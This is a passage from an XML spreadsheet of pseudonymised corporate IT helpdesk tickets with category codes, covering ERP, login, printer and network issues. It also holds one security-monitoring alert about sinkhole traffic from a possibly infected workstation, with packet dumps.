packet(s):_x000a_==pcap 1 hex s==_x000a_000000 0c00 0000 12b5 e357 c9eb 0600 1c01 0000 .......w........_x000a_000010 1c01 0000 4500 011c bf3b 4000 3706 7328 ....e....;@.7.s(_x000a_000020 c316 1af8 0a14 2856 0050 c6b9 4abb a086 ......(v.p..j..._x000a_000030 f507 9dce 8018 0035 729f 0000 0101 080a .......5r......._x000a_000040 e2af 22c6 0e4e 09ab 4854 5450 2f31 2e31 ..&quot;..n..http/1.1_x000a_000050 2032 3030 204f 4b0d 0a53 6572 7665 723a .200.ok..server:_x000a_000060 206e 6769 6e78 0d0a 4461 7465 3a20 5468 .nginx..date:.th_x000a_000070 752c 2032 3220 5365 7020 3230 3136 2031 u,.22.sep.2016.1_x000a_000080 303a 3430 3a31 3820 474d 540d 0a43 6f6e 0:40:18.gmt..con_x000a_000090 7465 6e74 2d54 7970 653a 2074 6578 742f tent-type:.text/_x000a_0000a0 6874 6d6c 0d0a 436f 6e6e 6563 7469 6f6e html..connection_x000a_0000b0 3a20 636c 6f73 650d 0a53 6574 2d43 6f6f :.close..set-coo_x000a_0000c0 6b69 653a 2061 6e62 7472 3d63 3336 3133 kie:.anbtr=c3613_x000a_0000d0 6464 3330 3137 6337 3837 3932 3838 3330 dd3017c898039941_x000a_0000e0 3134 3762 3563 6661 6332 373b 2064 6f6d 147b5cfac27;.dom_x000a_0000f0 6169 6e3d 2e6d 7973 6c69 647a 2e63 6f6d ain=.myslidz.com_x000a_000100 0d0a 436f 6e74 656e 742d 456e 636f 6469 ..content-encodi_x000a_000110 6e67 3a20 677a 6970 0d0a 0d0a 1f8b 0800 ng:.gzip........_x000a_000120 0000 0000 0003 0300 0000 0000 0000 0000 ................_x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v=" ship-to # 81051078 + 81053823 created in distributor_tool / not visible in ecc"/>
    <s v="i have created a new ship-to # 81053823 for the sold-to # 81543703 via distributor_tool._x000d__x000a_this ship-to can't be found either in ecc nor in distributor_tool. _x000d__x000a_you can only see that it actually exists in crm. _x000d__x000a_same situation as with ship-to # 81051078._x000d__x000a__x000d__x000a_all the data are complete in crm and the system does not show any errors.  but for some reason, these ship-to's are not transferred into ecc._x000d__x000a_could you please look at that?_x000d__x000a_"/>
    <s v="repyzajo lxfwopyq"/>
    <x v="14"/>
  </r>
  <r>
    <s v="security incidents - ( #in33944327) :possible malware infection - traffic from sinkhole domain to ekxl7000016"/>
    <s v="source ip :_x000d__x000a_system name :_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:_x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 5286271_x000d__x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000d__x000a_occurrence count: 3_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 195.22.26.248_x000d__x000a_source hostname: 248.192/26.26.22.195.in-addr.arpa._x000d__x000a_anubisnetworks.com._x000d__x000a_source port: 80_x000d__x000a_source ip geolocation: lisbon, prt_x000d__x000a_destination ip: 08.79.36.8523_x000d__x000a_destination hostname: ekxl8111127 _x000d__x000a_destination port: 50049_x000d__x000a_destination mac address: 3c:a9:f4:22:ba:ec_x000d__x000a_connection directionality: incoming_x000d__x000a_protocol: tcp_x000d__x000a_http status code: 200_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 10.16.4.16_x000d__x000a_device name: isensor04.company.com_x000d__x000a_log time: 2016-09-22 at 09:35:51 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 590716_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 2_x000d__x000a_vendor version: 7_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 699417_x000d__x000a_inspector event id: 638402921_x000d__x000a_ontology id: 200020003203755736_x000d__x000a_event type id: 200020003203582148_x000d__x000a_agent id: 102823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2983][event id: 590716][time: 2585647062.510177]_x000d__x000a_[src ip: 195.22.26.248][dst ip: 08.79.36.8523][sport/itype: 80][dport/icode: 50049][proto: 6]_x000d__x000a_09/22/2016-09:35:51.510177 195.22.26.248:80 -&gt; 08.79.36.8523:50049_x000d__x000a_tcp ttl:55 tos:0x0 id:21540 iplen:20 dgmlen:279 df_x000d__x000a_***ap**f seq: 0xf7ae9448 ack: 0x5dd9d0de win: 0x68b0 tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 22 04:02:00 60.43.89.120 dhcpd[23598]: dhcpack on 08.79.36.8523 to 3c:a9:f4:22:ba:ec (ekxl8111127) via eth2 relay 97.65.25.820 lease-duration 604729 (renew)_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.......w............e...t$@.7............p.....h]...p.h.....http/1.1.200.ok..server:.nginx..date:.thu,.22.sep.2016.09:35:51.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=f34d5b1ccc2b299beffaf2b6227b7a09;.domain=.space-ambiance.com..content-encoding:.gzip........................_x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 f7a5 e357 e1c8 0700 1701 0000 .......w........_x000d__x000a_000010 1701 0000 4500 0117 5424 4000 3706 f5ab ....e...t$@.7..._x000d__x000a_000020 c316 1af8 0a10 10f3 0050 c381 f7ae 9448 .........p.....h_x000d__x000a_000030 5dd9 d0de 5019 68b0 171f 0000 4854 5450 ]...p.h.....http_x000d__x000a_000040 2f31 2e31 2032 3030 204f 4b0d 0a53 6572 /1.1.200.ok..ser_x000d__x000a_000050 7665 723a 206e 6769 6e78 0d0a 4461 7465 ver:.nginx..date_x000d__x000a_000060 3a20 5468 752c 2032 3220 5365 7020 3230 :.thu,.22.sep.20_x000d__x000a_000070 3136 2030 393a 3335 3a35 3120 474d 540d 16.09:35:51.gmt._x000d__x000a_000080 0a43 6f6e 7465 6e74 2d54 7970 653a 2074 .content-type:.t_x000d__x000a_000090 6578 742f 6874 6d6c 0d0a 436f 6e6e 6563 ext/html..connec_x000d__x000a_0000a0 7469 6f6e 3a20 636c 6f73 650d 0a53 6574 tion:.close..set_x000d__x000a_0000b0 2d43 6f6f 6b69 653a 2061 6e62 7472 3d66 -cookie:.anbtr=f_x000d__x000a_0000c0 3334 6435 6231 6363 6332 6232 3939 6265 34d5b1ccc2b299be_x000d__x000a_0000d0 6666 6166 3262 3632 3237 6237 6130 393b ffaf2b6227b7a09;_x000d__x000a_0000e0 2064 6f6d 6169 6e3d 2e73 7061 6365 2SID_26 .domain=.space-a_x000d__x000a_0000f0 6d62 6961 6e63 652e 636f 6d0d 0a43 6f6e mbiance.com..con_x000d__x000a_000100 7465 6e74 2d45 6e63 6f64 696e 673a 2067 tent-encoding:.g_x000d__x000a_000110 7a69 700d 0a0d 0a1f 8b08 0000 0000 0000 zip............._x000d__x000a_000120 0303 0000 0000 0000 0000 00 ..........._x000d__x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? 1135889479/000020_x000d__x000a_5018083720/00001_x000d__x000a__x000d__x000a_what material or item number? 7133965_x000d__x000a__x000d__x000a_what warehouse location? _x000d__x000a_plant_108 to plant_283_x000d__x000a__x000d__x000a_issue description / error message? no message"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="5"/>
  </r>
  <r>
    <s v="9047883335 - sales inwarehouse_tool rejected as the banking details are not printed"/>
    <s v="the footer with banking details has not printed on inwarehouse_tool 0158994446, the customer has rejected this inwarehouse_tool until the footer details are corrected."/>
    <s v="lmwfdnri joplxizv"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to detect the dell  usb adapter"/>
    <s v="unable to detect the dell  usb adapter_x000d__x000a__x000d__x000a_"/>
    <s v="ztrpuvdf jlahkmdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="india high latency"/>
    <s v="india high latency"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="3"/>
  </r>
  <r>
    <s v="analysis add-in getting disabled"/>
    <s v="analysis add-in getting disabled"/>
    <s v="tqpbazxm jhbkycgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lcowx216132"/>
    <s v="_x000a__x000a_received from: zwirhcol.narzlmfw@gmail.com_x000a__x000a_computer has lost connectivity to the network_x000a__x000a_j. shrugott tyhuellis_x000a_usa facilities mgr._x000a_zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="zwirhcol narzlmfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lcow7404551"/>
    <s v="_x000a__x000a_received from: zwirhcol.narzlmfw@gmail.com_x000a__x000a_computer has partial connectivity to network.  cannot get to all drives needed_x000a__x000a_j. shrugott tyhuellis_x000a_usa facilities mgr._x000a_zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="zwirhcol narzlmfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="clad qc computer is moving to a new location"/>
    <s v="this computer is moving to a new location, the new setup needs to be completed so production is not interrupted._x000d__x000a_note:  shrugott tyhuellis may or may not have entered a ticket for this move."/>
    <s v="uqrbzknc snvimeqt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="clad qc computer cannot access the erp, shop_floor_app and shared files to do his work,  "/>
    <s v="brgtyad ahdwqrson is the operator in this area, his work is at a standstill which also affects subsequent operations - nearing end of month the product needs to move and computer work needs to be complete"/>
    <s v="uqrbzknc snvimeqt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="gthxezqp ainuhbmk desk is moving, cables need run to new location and service needs to be restored in new location"/>
    <s v="in the next week the operators control desk is moving to make room for other equipment.  this computer setup has 7-computers, 6 of which are connected to the furnace operations for monitoring by operators in the area.  the table needs to physically move and the cables need to be re-activated in the new location.  the other computer in this area is connected to shop_floor_app and shared files for the operators to access their work files - all of this must work in the new location."/>
    <s v="uqrbzknc snvimeqt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="the computer in my office needs access to the o-drive for &quot;rolling data&quot;"/>
    <s v="this is a location for the access database for our rolling information, currently i need to interrupt their data entry to extract information for a project - also the database stopped calculating the density number, can you fix this?  my limited experience with access doesn't help me fix this problem._x000a__x000a_looks like the path is \\lan-d2 rolling_x000a_-contact :"/>
    <s v="uqrbzknc snvimeqt"/>
    <x v="11"/>
  </r>
  <r>
    <s v="auflÃ¶sung am bildschirm von pc eemw 8143337 sehr schlecht. Ã¤nderungen werden nicht Ã¼bernommen. "/>
    <s v="auflÃ¶sung am bildschirm von pc eemw 8143337 sehr schlecht. Ã¤nderungen werden nicht Ã¼bernommen. "/>
    <s v="egklxsoy hivwzjcf"/>
    <x v="41"/>
  </r>
  <r>
    <s v="engineering_tool log in problem"/>
    <s v="_x000a__x000a_received from: amrthruta.kadgdyam@company.com_x000a__x000a_hello team,_x000a__x000a_please check the below error i am getting during logging in for engineering_tool. i have changed my laptop. its details are as follows:_x000a__x000a_computer name_x000a__x000a_service tag_x000a__x000a_model name_x000a__x000a_aiul8912144_x000a__x000a_dvzlq12_x000a__x000a_latitude e5440_x000a__x000a__x000a_username: kadjuwqama_x000a_earlier i was using engineering_tool with the below laptop and username:_x000a__x000a_username: kadjuwqama_x000a_laptop name: awyl8911781_x000a__x000a_errors during engineering_tool login are as mentioned below._x000a_same error i get during company engineering_tool log in. please do the needful._x000a__x000a_[description: cid:image001.png@01SID_354e5.4e972400]_x000a__x000a_"/>
    <s v="pwvmkeza mzwqgejy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for rlhuwmve krcfhoxj on erp / qa / erp"/>
    <s v="please reset petrghada's SID_1 password as soon as possible."/>
    <s v="rlhuwmve krcfhoxj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop will not start up while docked, blue power light on the lights up briefly then goes off."/>
    <s v="laptop will not start up while docked, blue power light on the lights up briefly then goes off."/>
    <s v="zlemowkf hamtklux"/>
    <x v="2"/>
  </r>
  <r>
    <s v="business_client error during log in"/>
    <s v="_x000d__x000a__x000d__x000a_received from: amrthruta.kadgdyam@company.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_please check the below error i am getting during logging in business_client._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_354fa.b03a3570]_x000d__x000a__x000d__x000a_"/>
    <s v="pwvmkeza mzwqgejy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bluetooth headset bekommt keine verbindung mit pc - assign to qdxyifhj zbwtunpy  germany"/>
    <s v="bluetooth headset bekommt keine verbindung mit pc"/>
    <s v="bwgldaoe aczyfqjr"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="jyzkbgpm vxmjcbdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer problem / issue information"/>
    <s v="please complete all required questions below.  _x000d__x000a_if not, it will be returned back to the gsc / requester to provide required information_x000d__x000a__x000d__x000a__x000d__x000a_   â€¢  printer name / make - model?  (wy-27) _x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ? wy-27 printer to be added to my pc_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_   "/>
    <s v="ploxzuts utvimnwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need reset  password erp SID_1 system"/>
    <s v="need reset  password erp SID_1 system"/>
    <s v="gzawrocy shbgwxep"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_1132 failed in job_scheduler at: 09/22/2016 08:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1132 failed in job_scheduler at: 09/22/2016 08:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="to add a new employee to distribution lists"/>
    <s v="_x000a__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000a__x000a_hello,_x000a__x000a__x000a_1.    please add new csr wkgpcxqd vobarhzk (wkgpcxqd.vobarhzk@gmail.com&lt;mailto:wkgpcxqd.vobarhzk@gmail.com&gt; ) to following distribution lists:_x000a__x000a_distributors.service@company.com&lt;mailto:distributors.service@company.com&gt; (email bucket 3 company csr in poland are shatryung)_x000a__x000a_company-sales-team company-sales-team@company.com&lt;mailto:company-sales-team@company.com&gt;_x000a__x000a_company-promotion-emea company-promotion-emea@company.com&lt;mailto:company-promotion-emea@company.com&gt;_x000a__x000a__x000a__x000a_2.    to add esguiazn pqdjtzin (malgorzata.gugala@company.com&lt;mailto:malgorzata.gugala@company.com&gt;) to_x000a__x000a__x000a__x000a_bucket email@wpgmkt.com&lt;mailto:email@wpgmkt.com&gt;   &amp; company-promotion-emea@company.com&lt;mailto:company-promotion-emea@company.com&gt;_x000a__x000a__x000a__x000a_3.    xhnmygfp bnpehyku (joanna.pollaurid@company.com&lt;mailto:joanna.pollaurid@company.com&gt; ) to_x000a__x000a__x000a_company-promotion-emea company-promotion-emea@company.com&lt;mailto:company-promotion-emea@company.com&gt;_x000a__x000a__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="see attachment"/>
    <s v="see attachment_x000a_contact :  (uk)"/>
    <s v="xcufgmhj yezfxmga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when i call the germany office with telephony_software the can't hear me."/>
    <s v="when i call the germany office with telephony_software the can't hear me but i can hear them. this happended twice today (last interaction id 2175600354) but also some weeks ago._x000d__x000a_i have no problems when i call other people inside and outside the company."/>
    <s v="pxvzohlu hwyijpgd"/>
    <x v="6"/>
  </r>
  <r>
    <s v="blocked inwarehouse_tool for 5205 9048054513"/>
    <s v="blocked inwarehouse_tool in our system. reason for blocking &quot;document 0159165624 has been saved (foreign trade data incomplete) &quot;. (same as ticket_no1551982). _x000d__x000a_after first analysis, infos were available in mm 03 for  concerned materials. we know how to fix the issue, but before completing the document, please provide information or make further analysis in order to avoid this issue in the futur."/>
    <s v="ahmgtlyf ofgxcrys"/>
    <x v="12"/>
  </r>
  <r>
    <s v="videos won't play in skirtylport training"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_i am trying to take a training course and when i start the course the videos won't play. please advise._x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte konto erzeugen. ewew7212768"/>
    <s v="optiplex 5040 _x000a_messmachine _x000a_berirtch : zedghkler"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to access SID_1 "/>
    <s v="_x000d__x000a__x000d__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000d__x000a__x000d__x000a_hi it team_x000d__x000a__x000d__x000a_kindly please assist as i unable to access SID_1 in my system._x000d__x000a__x000d__x000a_attached for your reference. "/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for bwgldaoe aczyfqjr on erp / qa / erp"/>
    <s v="please reset my password in erp SID_1 erp uacyltoe hxgaycze system.. "/>
    <s v="bwgldaoe aczyfqjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to beyond evolution campaign reporting_engineering_tool "/>
    <s v="not able to login to beyond evolution campaign reporting_engineering_tool - #/site/certified_content"/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="8"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lvxakohq.tsfnhowj@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i am not able to log on to business_client soft ware in my laptop._x000d__x000a__x000d__x000a_pl do needful on priority._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with kind "/>
    <s v="lvxakohq tsfnhowj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp hrp hcm account lockout"/>
    <s v="erp hrp hcm account lockout"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit erpgui \jionmpsf wnkpzcmv"/>
    <s v="probleme mit erpgui \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v=" pc empw 8144239 neu aufsetzen"/>
    <s v="pc empw 8144239 neu aufsetzen"/>
    <s v="wyotidgu nydzrtuw"/>
    <x v="32"/>
  </r>
  <r>
    <s v="not able to create dc"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtarthi.erjgypa@company.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_we are unable to create delivery challan due to below error._x000d__x000a__x000d__x000a_[cid:image004.png@01SID_354e4.45837db0]_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_354e2.2aad98b0]_x000d__x000a__x000d__x000a_"/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/22/2016 05:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/22/2016 05:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="id04 printer not working at company"/>
    <s v="id04 printer not working at company"/>
    <s v="jvhqyamt wodzrcjg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="konto gesperrt \ handy wlan authentifizierungsproblem"/>
    <s v="konto gesperrt \ handy wlan authentifizierungsproblem"/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="24"/>
  </r>
  <r>
    <s v="access point defekt .\jxphgfmb gjbtuwek"/>
    <s v="access point defekt .\jxphgfmb gjbtuwek"/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit outlook \kwehgxts agdsqbwv"/>
    <s v="hallo ,_x000d__x000a__x000d__x000a_ich mÃ¶chte gerne das in der suche auch meine telefon-nr. erscheint_x000d__x000a_"/>
    <s v="kwehgxts agdsqbwv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit skype \difozlav dgbfptos \niptbwdq csenjruz"/>
    <s v="probleme mit skype \difozlav dgbfptos \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="1098572 stock issue"/>
    <s v="_x000a__x000a_received from: rgtoger.lfgtiu@company.com_x000a__x000a_hello it_x000a__x000a_there is 1pcs 2109683 under plant_283, but i can't run the dn for 7329411, please help check it, "/>
    <s v="bejcxvis anxmhwis"/>
    <x v="29"/>
  </r>
  <r>
    <s v="dvd palyer not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gwmspqeo.vwfetaqg@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_                the dvd player not working in my pc. kindly rectify._x000d__x000a__x000d__x000a_contact number: 0731105554/ #10196_x000d__x000a__x000d__x000a_"/>
    <s v="gwmspqeo vwfetaqg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="login problems in skype."/>
    <s v="login problems in skype."/>
    <s v="xnkqufwl hjnvudlk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please check pgi from delivery note 9169359948 "/>
    <s v="please check pgi from delivery note 8058248837"/>
    <s v="tvmlrwkz rsxftjep"/>
    <x v="17"/>
  </r>
  <r>
    <s v="your account"/>
    <s v="hello,_x000d__x000a__x000d__x000a_i'm unable to login on the bcd travel side as the creation of a password failed. see below_x000d__x000a__x000d__x000a_gruÃŸ "/>
    <s v="anuxbyzg bvsqcjkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_512 failed in job_scheduler at: 09/22/2016 03:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_512 failed in job_scheduler at: 09/22/2016 03:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="poland experience some response time slowness again"/>
    <s v="poland experience some response time slowness again"/>
    <s v="mcytlpva jutxbdor"/>
    <x v="13"/>
  </r>
  <r>
    <s v="usa - (company inc.):gigabitethernet2/0/49 -interface is down since at 3:13 am et on 09/22."/>
    <s v="usa - (company inc.): interface: gigabitethernet2/0/49 Â· uplink to company-na-usa-usa-conforma-3750-core-sw01 - on   company-na-usa-usa-conforma-bld-1-3750-stack-sw01since at 3:13 am et on 09/22."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="erp - SID_34 - long response time + long runtime"/>
    <s v="several users in fÃ¼rth including me are experiencing a drop in performance since some hours._x000d__x000a_opening transactions, executing transactions and extracting data out of erp takes significantly longer than usually._x000d__x000a_can you please check._x000d__x000a_"/>
    <s v="cfajzero vlygoksi"/>
    <x v="5"/>
  </r>
  <r>
    <s v="collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xaertwdh.kcsagvpy@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a_please advise? my collaboration_platform is not saving or syncing any files. the notice i get says: sync problems. "/>
    <s v="epAYsqnX RAkuDnXG"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook hangs."/>
    <s v="outlook hangs."/>
    <s v="cpsybwla snymigat"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool problem  - urgent-"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xnlapdeq.wupaeqlv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i have a problem with EU_tool, i can not get the transfer times of our employees._x000d__x000a_the downloaded file is empty. without this datas, it is not possible to calculate the &quot;productivity&quot; of our plants in germany._x000d__x000a__x000d__x000a_[cid:image002.png@01SID_354ae.6ad42a00]_x000d__x000a__x000d__x000a_[cid:image003.png@01SID_354ae.6ad42a00]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ssen / with kind "/>
    <s v="xnlapdeq wupaeqlv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="frequent account lock out."/>
    <s v="hello can you please do the daily reset of my vpn password. my account is vanghtydec. every second time i log in the password is blocked. _x000a_can please solve this problem on a structural basis?_x000a__x000a_contact : _x000a_user : vanghtydec"/>
    <s v="afplnyxb eiomnuba"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please provide permission to the files in m:\it department\networking"/>
    <s v="please provide permission to the files in m:\it department\networking"/>
    <s v="ytwmgpbk cpawsihk"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mikrofon vom mobiltelefon gigaset sl 3 defekt! "/>
    <s v="bitte telefon tauschen."/>
    <s v="qbsgwujo gvbzkjfq"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ship-to creation error"/>
    <s v="since we have many users that have multiple sold-tos assigned to their profile (eg. mfg_tooltors, distributors), there is an issue when they add new ship-to._x000d__x000a_1. create new ship-to related to the current selected sold-to ( works fine )_x000d__x000a_2. change the sold-to and create the exact same ship-to ( system error: ship-to already exists )_x000d__x000a_that is a problem, as user cannot create the same recipient address for multiple different sold-tos. the duplication check should only be done against the existing ship-tos of the currently selected sold-to._x000d__x000a_"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="20"/>
  </r>
  <r>
    <s v="full access to oe drive fÃ¼rth"/>
    <s v="_x000d__x000a__x000d__x000a_received from: scjxobhd.ldypjkmf@gmail.com_x000d__x000a__x000d__x000a_hello help team ,_x000d__x000a__x000d__x000a_can you pls. arrange full access for oscar usero and ivbkzcma nrehuqpa to the following oe drive on teams\\eagcldaten:_x000d__x000a__x000d__x000a__x000d__x000a_\\eagcldaten\teams\oe-12_kata&lt;file://eagcldaten/teams/oe-12_kata&gt;_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="33"/>
  </r>
  <r>
    <s v="please help to logon erp system"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rtjwbuev.gfpwdetq@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i am unable to logon erp system now. so please help me to check it. many "/>
    <s v="rtjwbuev gfpwdetq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage: engineering_toolkuznetsk warehouse - (company):interface vlan1 is down since at 1:13 am et on 09/22."/>
    <s v="engineering_toolkuznetsk warehouse - (company):vlan1 interface is down since at 1:13 am et on 09/22."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="awb 0276036761 / sin - jnb "/>
    <s v="hi johthryugftyson_x000a__x000a_any update form it team as i want to close this issue._x000a__x000a_"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="bitte erstellen sie mir eine liste Ã¼ber alle berechtigungen bzw zugriffe von cvltebaj yzmcfxah (rostuhhwr)"/>
    <s v="bitte erstellen sie mir eine liste Ã¼ber alle berechtigungen bzw zugriffe von cvltebaj yzmcfxah (rostuhhwr)"/>
    <s v="ukvlnrwb fiyeczmh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create new or any exepnse report - info type '0017' error "/>
    <s v="user is a new employee and unable to create expense report and getting error as mentioned in screenshot, please find the attachment"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="9"/>
  </r>
  <r>
    <s v="i  can not log  in  erp"/>
    <s v="password logon no longer possible - too many failed attempts"/>
    <s v="qdbfemro mcsqzlvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa access for configuring outlook exchange on windows phone "/>
    <s v="usa access for configuring outlook exchange on windows phone "/>
    <s v="ytwmgpbk cpawsihk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for qdbfemro mcsqzlvd using password_management_tool password reset."/>
    <s v="i can not log in erp"/>
    <s v="qdbfemro mcsqzlvd"/>
    <x v="16"/>
  </r>
  <r>
    <s v="plm response is very slow"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hctduems.znalhivf@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_good day!_x000d__x000a__x000d__x000a_from morning it's been observed like plm response is very slow._x000d__x000a__x000d__x000a_kindly take the action against it._x000d__x000a__x000d__x000a_"/>
    <s v="hctduems znalhivf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="users are complaining that erp response is very slow &amp; getting disconnected frequently."/>
    <s v="users are complaining that erp response is very slow &amp; getting disconnected frequently."/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="13"/>
  </r>
  <r>
    <s v="given name and sur name changes required in windows domin"/>
    <s v="given name and surname changes required in windows domain. please change it to _x000d__x000a_hnkwirgv wdgebvpzagavan_x000d__x000a_"/>
    <s v="hnkwirgv wdgebvpz"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp slow response"/>
